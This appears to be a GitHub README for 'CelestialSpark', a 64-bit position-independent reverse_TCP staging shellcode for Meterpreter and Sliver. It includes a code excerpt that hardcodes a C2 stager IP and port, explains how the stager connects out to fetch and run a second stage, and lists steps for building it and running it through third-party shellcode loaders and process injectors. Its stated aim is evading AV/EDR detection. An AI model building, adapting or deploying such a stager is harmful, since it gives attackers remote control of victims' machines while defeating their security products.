CelestialSpark

A modern 64-bit position independent meterpreter and Sliver compatible reverse_TCP Staging Shellcode based on Cracked5piders Stardust

#include <Common.h>
#include <Constexpr.h>
#pragma comment(lib, "ws2_32.lib")

LPWSTR* arglist;
// Define IP Adress of your C2 Stager (!)
#define IP_STR  "10.10.10.10"
// Define PORT 443 of your TCP Stager
#define PORT 443
...

Why

I wanted to improve my understanding of position independent Shellcode, plus... My Meterpreter reverse_TCP Stager gets caught by a lot of AV/EDRs and I was hoping to somehow get around the IoCs the 15 year old Meterpreter reverse_TCP Shellcode generated by msfvenom. Inspirations were:

• https://github.com/SherifEldeeb/TinyMet
• https://github.com/rapid7/metasploit-framework/blob/master/external/source/shellcode/windows/x86/src/block/block_reverse_tcp.asm

How does it work

• not existing HTONS and HTONL functions have been hardcoded
• custom inet_addr function was rewritten and implemented in Main.C
• Socket creation and interaction functions have been imported from ws2_32.dll
• Meterpreter Staging Logic hase been copied from the original project and TinyMet

Usage

• Git clone
• change IP and Port in Main.c
• disable the messagebox right before the Stage2 shellcode execution (if it bothers you)
• make
• Use your favourite Shellcode Loader/Injector. I Successfully tested:
  • https://github.com/Cipher7/ChaiLdr
  • https://github.com/florylsk/ExecIT
  • https://github.com/3xpl01tc0d3r/ProcessInjection
  • the original Stardust Loader written by Cracked5pider